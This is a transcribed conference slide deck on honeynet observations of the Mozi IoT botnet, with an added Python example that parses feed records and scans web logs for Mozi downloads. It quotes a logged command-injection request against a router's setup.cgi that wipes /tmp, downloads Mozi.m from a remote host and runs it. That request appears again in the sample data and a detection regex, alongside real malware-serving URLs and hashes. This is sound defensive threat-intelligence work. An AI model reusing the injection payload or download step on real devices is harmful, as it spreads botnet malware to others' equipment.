
38th TWNIC OPM: Observations and mitigation of Mozi botnet



  1. Observations and Mitigation of Mozi botnet
     Adli Wahid <adli@apnic.net>, Senior Internet Security Specialist, APNIC

  2. Let's Connect!
     • LinkedIn: Adli Wahid
     • Twitter/Instagram: @adliwahid
     • Email: adli@apnic.net
     https://unsplash.com/@adliwahid

  3. Discussion
     1. Background
     2. Mozi (IoT) Botnet
     3. Observations
     4. Vulnerabilities & Products
     5. Mitigation & Remediation
     Note: credits to Anutsetsen Enkhzoright (anutsetsen.e@khanbank.com) for initial work on the research & presentation

  4. Background (Source of Data)
     • APNIC Community Honeynet Project
       o Collaboration with partners across AP
     • Honeypots & Honeynet
       o Anything that interacts with the honeypots is suspect
       o Confirmed with observed actions + artifacts (payload, logs, etc.)
       o Definitely not 'spoofed' traffic
     • Types of Honeypots
       o Telnet/SSH (Cowrie) ** relevant for this talk
       o Old vulnerabilities, i.e. SMB (Dionaea)

  5. What We Observe
     • Attacks that spread via
       o SSH & Telnet brute force
       o Exploiting _known_ vulnerabilities
     • Nature of
       o Malware: cryptominers, DDoS agents, etc.
       o Source of attack == infected devices*
     • Left of the Hack
       o Observations on attacker's infrastructure
       o Bot recruitment
       o Scripts, malware payload, traffic
     • Attacks that no one pays attention to :)
     [Figure: DDoS attack timeline. "Left of the Hack": build/buy infrastructure, write malware, infect devices, set up Command & Control. Then "The Hack".]

  6. Mozi Botnet
     • Discovered in September 2019 by Netlab
     • Significant outbreak in Sept 2020 (100k nodes)
     • Targets IoT devices (MIPS, ARM, PPC and x86)
     • Uses unique P2P Command & Control
       o BitTorrent Distributed Hash Table (DHT) as carrier protocol
       o Makes it robust & tricky* to track
     • Some capabilities (from config)
       o Perform a DDoS attack
       o Update executable from given URL
       o Execute command via shell or system()
       o DNS spoofing
       o HTTP session hijacking (with JS)
       o Mining
     • Code base from other botnets
       o Gafgyt
       o Mirai
     • Propagation
       o 14 HTTP-based exploits via the web interface of IoT devices
       o Mainly Telnet**, FTP, SSH credentials brute force
  7. (Nmap scan of a serving host)
       Nmap scan report for host-x.static.kbtelecom.net (219.x.y.184)
       Host is up (0.062s latency).
       PORT      STATE SERVICE VERSION
       53387/tcp open  elf-exe ELF 32-bit executable file
     This host was serving malware (HTTP on port 53387). Shodan fingerprints the device as a DVR.

  8. [Diagram: a typical DDoS botnet (Mirai, etc.) has infected devices, a server hosting the payload and a Command & Control server. In Mozi, each infected node communicates with other nodes; there is no centralized infrastructure.]

  9. Mozi author "taken into custody" by LEA in 2021
     https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/
     Is it still around?

  10. 2022 - Still Active?
       durian.fsck.my -- 93.56.202.158 [10/Oct/2022:14:24:55 +0900] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://93.56.202.158:53157/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0
      Check your webserver logs for Mozi.a or Mozi.m
  11. Observations in APNIC Honeynet Project
      • In 05/2022, we observed an ELF binary ".i" in some URLs
        o Post-login downloads
      • Pattern looks familiar: http://xxx.xxx.xxx.xxx:random_port/.i
      • IP in URL can be the same as the attacking host or different
      Feed records: timestamp, source IP (attacking/spreading), URL of the IP hosting the binary:random_port, country, ASN
        2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766
        2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134
        2022-05-26T03:46:12.338083,114.34.185.8,hxxp://114.34.185.8:11470/.i,TW,3462
        2022-05-26T03:30:41.219380,95.154.75.244,hxxp://95.154.75.244:12107/.i,RU,44724
        2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224
        2022-05-26T07:58:51.970983,167.179.185.255,hxxp://31.168.218.95:28681/.i,AU,4764
        2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134
        2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273
      [Diagram of the infection sequence: 1. Telnet username:password; 2. wget http://x.x.x.x:nnnn/.i]

  12. The ".i" & Finding Mozi
      • .i: ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, stripped
      • SHA256: a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3
        o Known to VirusTotal
      • Finding Mozi
      • Maybe we can find Mozi.m or Mozi.a on the webserver?
        o If .i is in $IP:PORT
        o Then download $IP:PORT/mozi.a || $IP:PORT/mozi.m || $IP:PORT/Mozi.m || $IP:PORT/Mozi.a || $IP:PORT/config

  13. Observations: (hash) fingerprints (file name, SHA256)
        ~/feeds/dload/20220601/50.83.145.125:43900$ sha256sum *
        .i      a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3
        mozi.a  a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3
        Mozi.a  a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3
        mozi.m  9bcbb326a28b09faeb6fbfc0e7d68fe6ff79b7248c7b2510aa8dd11cc55e0356
        Mozi.m  b82e420c071c1c1a5cbf1ad8ba143f5b804a6fe4fd2fbcd28db20f471b7065ab

        ~/feeds/dload/20220601/222.103.181.173:1117$ sha256sum *
        .i      479768e26969e241244a475f97b1268fd02e303a8d6b5d15c71b552815cae14b
        mozi.a  a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3
        Mozi.a  a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3
        mozi.m  a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3
        Mozi.m  6d41f05fe458414332980d420e42b12d01bd21497631f5b6e60fc8082c170bed

        ~/feeds/dload/20221011/36.229.220.191:27611$ sha256sum *
        .i      23171f17aa39a4b7c9c492c9bc4668697f68e1863c77ef6502e38ca53860c2fa
        i       b6d6ee5d756cfe9a9638769abef15294d7a9189ac49dc43d9b06fb04976b3bf5
        mozi.a  a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3
        Mozi.a  b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657
        mozi.m  b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657
        Mozi.m  289aba46ba734b2aef8a82dc983ef1451e303fc33c05820dd07cb7551ad1a310
      Are they the same files?
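The triage the deck describes on slides 10 to 13 (spot the `http://IP:random_port/.i` download pattern in honeynet feed records, note when the host serving the binary is not the attacking device, and check web-server logs for a `Mozi.m` fetch) as an added Python example; this is not code from the deck or from APNIC, the feed column order is taken from slide 11, and the sample records and access-log line are constructed with RFC 5737 documentation addresses:

```python
import re
from urllib.parse import urlparse

# File names the deck shows on serving hosts: ".i", "mozi.a"/"Mozi.a", "mozi.m"/"Mozi.m", "config".
MOZI_NAMES = {".i", "mozi.a", "mozi.m", "config"}

def refang(url):
    # Feeds write hxxp:// so the link is not clickable; restore the scheme for parsing.
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.I)

def parse_feed_record(line):
    """Feed format shown on slide 11: timestamp,source_ip,url,country,asn."""
    ts, src_ip, url, country, asn = line.strip().split(",")
    u = urlparse(refang(url))
    name = u.path.rsplit("/", 1)[-1].lower()        # case-insensitive: mozi.a == Mozi.a
    return {"ts": ts, "src_ip": src_ip, "host": u.hostname, "port": u.port,
            "country": country, "asn": asn, "mozi_like": name in MOZI_NAMES,
            # Slide 16: the server hosting Mozi is not always the attacking device.
            "third_party_host": u.hostname != src_ip}

# Slide 10 pattern: setup.cgi command injection whose query wgets Mozi.m
# ('+' is the URL-encoded space inside the cmd= parameter).
ACCESS_LOG_RE = re.compile(r"wget\+(?:hxxp|http)://([\d.]+):(\d+)/(Mozi\.[am])", re.I)

def scan_access_log(line):
    """Return serving host/port/file if an access-log line fetches a Mozi payload, else None."""
    m = ACCESS_LOG_RE.search(line)
    return None if m is None else {"host": m.group(1), "port": int(m.group(2)), "file": m.group(3)}

def serving_hosts(lines):
    """Count distinct attacking IPs per host:port serving a Mozi-like file (repeat offenders)."""
    counts = {}
    for r in map(parse_feed_record, lines):
        if r["mozi_like"]:
            counts.setdefault(f'{r["host"]}:{r["port"]}', set()).add(r["src_ip"])
    return {k: len(v) for k, v in counts.items()}

# Constructed sample data (documentation addresses 192.0.2.0/24, 198.51.100.0/24,
# 203.0.113.0/24 and private ASNs); not records from the APNIC feed.
SAMPLE_FEED = [
    "2022-05-26T03:46:12.338083,192.0.2.8,hxxp://192.0.2.8:11470/.i,TW,64496",
    "2022-05-26T06:51:04.319952,198.51.100.173,hxxp://203.0.113.165:23349/.i,IR,64497",
    "2022-05-26T07:10:00.000000,198.51.100.9,hxxp://203.0.113.165:23349/Mozi.m,TW,64496",
    "2022-05-26T07:20:00.000000,192.0.2.9,hxxp://192.0.2.9:8080/index.html,TW,64496",
]
SAMPLE_ACCESS_LOG = ('203.0.113.7 - - [10/Oct/2022:14:24:55 +0900] "GET /setup.cgi?next_file=netgear.cfg'
                     '&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://203.0.113.7:53157/Mozi.m+-O+/tmp/netgear;'
                     'sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0')
```

Run `serving_hosts(SAMPLE_FEED)` to see which serving host:port pairs were fetched by more than one attacking IP, and feed real access-log lines through `scan_access_log` to perform the "check your webserver logs" step from slide 10.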
  14. Slowly increasing over the last 6 months
      [Chart: daily hits. Snapshot on 29/11/2022.]

  15. IP from TW, last 6 months [snippet]
        2022-11-29T00:41:00.077072,60.x.y.205,hxxp://60.x.y.205:61756/.i,TW,3462
        2022-11-29T08:49:20.515523,59.x.y.10,hxxp://59.x.y.10:12819/.i,TW,3462
        2022-11-29T09:01:48.079099,220.x.y.53,hxxp://220.x.y.53:29971/.i,TW,3462
        2022-11-29T17:53:40.465965,49.x.y.24,hxxp://49.x.y.24:45704/.i,TW,18049
        2022-11-30T15:48:10.382224,123.x.y.244,hxxp://171.x.y.95:39821/.i,TW,131596

  16. Serving Malware
      Source from MN IP serving Mozi binary:
        2022-08-30T11:07:19.374102,202.x.y.26 (MN),hxxp://61.a.b.131:58871/.i (TW)
        2022-10-18T12:34:38.452976,202.x.y.26 (MN),hxxp://219.a.b.184:53387/.i (TW)
      * Server hosting Mozi is not the attacking device
      ** Repeat offenders

  17. Mitigation & Remediation (not just Mozi)
      • To prevent
        o Spread
        o Impact (i.e. DDoS, redirect, mining)
      • The Usual Advice
        o Harden device: patch, strong credentials
        o But whose job is it anyway?
      • Proactive: Monitor, Respond & Share***
        o Get feeds on infected devices
        o Sources of feeds: ShadowServer Foundation, DASH/APNIC Honeynet, Abuse.ch ThreatFox
        o Have a response plan
      • Threat awareness
        o Attackers build infrastructure before attacking
        o Don't wait for an attack to happen

  18. Thank You!
      Adli Wahid <adli@apnic.net>

  19. Resources
      1. https://blog.netlab.360.com/mozi-another-botnet-using-dht/
      2. https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/
      3. Mozi Tools: https://kn0wledge.fr/projects/mozitools/
      4. https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/
      5. ShadowServer Foundation: https://www.shadowserver.org/what-we-do/network-reporting/get-reports/
      6. APNIC DASH: https://dash.apnic.net
      7. APNIC Community Honeynet Project: adli@apnic.net
